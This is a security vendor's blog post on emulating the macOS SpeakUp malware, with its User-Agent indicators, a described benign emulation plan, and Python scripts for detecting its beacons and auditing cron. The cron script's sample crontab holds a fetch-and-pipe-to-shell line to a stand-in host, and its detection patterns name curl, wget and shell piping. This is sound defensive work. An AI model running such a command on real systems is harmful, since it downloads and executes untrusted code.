This #ThreatThursday we are releasing our first macOS threat to the SCYTHE Community Threats GitHub. As more and more customers migrate to Apple products, we want to provide adversary emulation plans that work against macOS as well. SCYTHE has the ability to create campaigns for Windows, Linux, and macOS. This post will look at emulating a macOS threat known as SpeakUp.
Cyber Threat Intelligence
SpeakUp is documented and mapped to MITRE ATT&CK in its own software page. SpeakUp has a Linux and a macOS variant and we will focus on emulating the macOS variant. The main reference to this threat actor comes from research at CheckPoint.
SpeakUp uses POST and GET requests over HTTP to talk to its command and control server, and does some interesting things with the User Agent as well as with POST requests. The initial POST packet will send a victim ID so that it can register the victim on the C2 server. Once registered, the implant will look to pull more information on the victim through the use of common discovery commands such as “uname -a” and “ifconfig -a”. The implant also has a fixed “knock” interval that it uses to communicate with the C2 server for new commands.
As for the User Agent, SpeakUp uses three specific User-Agents for communication with its C2 server. Two of the User Agents are MacOSX strings, while the third is a hashed string of the word liteHTTP:
- Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD
- Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
- E9BC3BD76216AFA560BFB5ACAF5731A3
One of SpeakUp’s main features is its ability to serve another payload post-infection. We have seen SpeakUp serve XMRig miners to its infected servers to mine Monero coins. It should be able to just as easily serve another type of miner or something even more destructive.
Adversary Emulation Plan
To emulate SpeakUp, we’ll first use SCYTHE’s default heartbeat, since SpeakUp has a fixed knock interval when communicating with the C2 server. We’ll also use one of the two MacOSX User-Agents for this macOS campaign.
Here is an adversary emulation profile for SpeakUp. The emulation plan can be downloaded from the SCYTHE Community Threats Github and imported to your SCYTHE instance.
To set the User Agent, it is as simple as adding parameters for the Communication Modules:
As mentioned in the Cyber Threat Intelligence portion, SpeakUp looks to register the victim information onto the C2 server through the use of a number of discovery commands.
Since SpeakUp is also able to serve an additional payload, we will be using the downloader module to grab a benign file, save it as a shell script, then cat it as a proof of concept. This will allow us to stay non-destructive with our emulation.
Defend against SpeakUp
The primary tool in defending against SpeakUp comes from a common source: the network traffic. As of the reporting, we can see that SpeakUp reliably uses specific User-Agents and heartbeat intervals for its C2. For example, in SpeakUp’s HTTP traffic, a network monitor would reliably see the strings “Mobile/BADDAD”, “Mobile/7B405” and “E9BC3BD76216AFA560BFB5ACAF5731A3”; together these create some very clear IOCs to look for at the network layer.
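The two network-layer signals described above (the fixed User-Agent strings from the Cyber Threat Intelligence section and the fixed knock interval) can be checked against a web proxy or server access log. The script below is an added example written for this post, not SCYTHE code or anything from the Check Point research: it parses Apache combined-format log lines (the sample lines are constructed, with made-up private addresses and paths), flags any request whose User-Agent contains one of the three reported SpeakUp markers, and separately flags any source whose inter-request gaps are nearly constant, which is what a fixed heartbeat looks like from the server side. The jitter threshold and the minimum request count are assumptions to tune for your environment.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# User-Agent fragments reported for SpeakUp in the post above
SPEAKUP_UA_MARKERS = (
    "Mobile/BADDAD",
    "Mobile/7B405",
    "E9BC3BD76216AFA560BFB5ACAF5731A3",
)

# Constructed sample log lines (Apache combined format); 10.0.0.5 beacons every
# 30 s with a SpeakUp UA, 10.0.0.7 is ordinary browsing, 10.0.0.9 sends the hash UA.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2020:10:00:00 +0000] "POST /register HTTP/1.1" 200 12 "-" "Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405"
10.0.0.5 - - [12/Mar/2020:10:00:30 +0000] "GET /cmd HTTP/1.1" 200 40 "-" "Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405"
10.0.0.5 - - [12/Mar/2020:10:01:00 +0000] "GET /cmd HTTP/1.1" 200 40 "-" "Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405"
10.0.0.5 - - [12/Mar/2020:10:01:30 +0000] "GET /cmd HTTP/1.1" 200 40 "-" "Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405"
10.0.0.7 - - [12/Mar/2020:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Safari/605.1.15"
10.0.0.7 - - [12/Mar/2020:10:03:41 +0000] "GET /about.html HTTP/1.1" 200 300 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Safari/605.1.15"
10.0.0.9 - - [12/Mar/2020:10:02:00 +0000] "POST /register HTTP/1.1" 200 12 "-" "E9BC3BD76216AFA560BFB5ACAF5731A3"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"src": m.group("src"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "ua": m.group("ua")}


def ua_hits(records):
    """(source, marker) for every request whose User-Agent carries a SpeakUp marker."""
    hits = []
    for r in records:
        for marker in SPEAKUP_UA_MARKERS:
            if marker in r["ua"]:
                hits.append((r["src"], marker))
    return hits


def beacon_candidates(records, min_requests=4, max_jitter=0.1):
    """Sources whose inter-request gaps are nearly constant, mapped to the mean gap in seconds.

    max_jitter is the allowed ratio of standard deviation to mean gap (assumed tuning value).
    """
    by_src = defaultdict(list)
    for r in records:
        by_src[r["src"]].append(r["ts"])
    flagged = {}
    for src, stamps in by_src.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            flagged[src] = avg
    return flagged


def analyze(log_text):
    """Run both checks over raw log text and return the findings."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    return {"ua_hits": ua_hits(records), "beacons": beacon_candidates(records)}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(key, value)
```

The User-Agent match is the high-confidence signal; the interval check is noisier on its own (software updaters and monitoring agents also beacon on fixed schedules), so treat a fixed-interval source as a lead to pivot on, and a fixed-interval source that also carries one of the SpeakUp strings as an alert.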
As for the behaviors and propagation, defense can be found by monitoring and logging accounts for strange or unexpected behavior. The ability to detect when users (and especially root) are running commands without your intent is critical to catching threats such as SpeakUp early. Finally, regular auditing of cron is critical, as this is SpeakUp’s primary mechanism for persistence.
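For the cron audit, here is an added example (written for this post, not SCYTHE's tooling) that parses crontab text and reports entries a defender would want to look at: commands that fetch remote content, pipe into a shell, run from hidden directories or temp directories, or decode base64. The per-user crontab directory on macOS is /usr/lib/cron/tabs; the two Linux spool paths are included so the same script can run across a mixed fleet. The sample crontab is constructed, and the pattern list is an assumption to extend for your environment.

```python
import os
import re
import sys

# Per-user crontab spool directories: macOS first, then common Linux locations.
CRONTAB_DIRS = ("/usr/lib/cron/tabs", "/var/spool/cron/crontabs", "/var/spool/cron")

# Assumed patterns worth a second look in a scheduled command.
SUSPICIOUS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "hidden_path": re.compile(r"(^|/)\.[^./\s][^/\s]*/"),  # runs from a dotted directory
    "temp_dir": re.compile(r"/(tmp|var/tmp|dev/shm)/"),
    "decode": re.compile(r"\bbase64\b"),
}

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week


def parse_crontab(text):
    """Yield (schedule, command) for each entry, skipping comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):  # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, CRON_FIELDS)
            if len(parts) <= CRON_FIELDS:
                continue  # malformed: schedule without a command
            sched, cmd = " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]
        yield sched, cmd.strip()


def audit_crontab(text):
    """Return a list of findings, one per entry that matches at least one pattern."""
    findings = []
    for sched, cmd in parse_crontab(text):
        reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if reasons:
            findings.append({"schedule": sched, "command": cmd, "reasons": reasons})
    return findings


def audit_system():
    """Audit every user's crontab found in the spool directories (needs root to read them)."""
    report = {}
    for directory in CRONTAB_DIRS:
        if not os.path.isdir(directory):
            continue
        for user in os.listdir(directory):
            path = os.path.join(directory, user)
            try:
                with open(path) as fh:
                    report[user] = audit_crontab(fh.read())
            except OSError as err:
                print(f"skip {path}: {err}", file=sys.stderr)
    return report


# Constructed sample: one backup job, one fetch-and-pipe entry, one hidden-path script.
SAMPLE_CRONTAB = """\
# constructed sample crontab
PATH=/usr/bin:/bin
0 2 * * * /usr/bin/tmutil startbackup
*/5 * * * * curl -s http://updates.example.invalid/u | sh
@reboot /Users/Shared/.cache/update.sh
30 6 * * 1 /usr/local/bin/brew update
"""


if __name__ == "__main__":
    target = audit_system() if os.geteuid() == 0 else {"sample": audit_crontab(SAMPLE_CRONTAB)}
    for user, findings in target.items():
        for f in findings:
            print(f"{user}: [{', '.join(f['reasons'])}] {f['schedule']} {f['command']}")
```

Run it as root to walk the real spool; otherwise it audits the embedded sample. Pair the output with a baseline of known-good entries so that recurring legitimate jobs (backups, package updates) can be suppressed and only new or changed entries are raised.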
In this #ThreatThursday, we looked at our first macOS community threat. We started by consuming Cyber Threat Intelligence about SpeakUp and learning about the macOS malware variant. We created an adversary emulation plan using the same User-Agent and C2 profile as SpeakUp, shared it in our Community Threats Github, and showed how to emulate it yourself. Lastly, we covered how to defend against macOS threats. We hope you enjoyed it!
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.
SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email firstname.lastname@example.org, visit https://scythe.io, or follow on Twitter @scythe_io.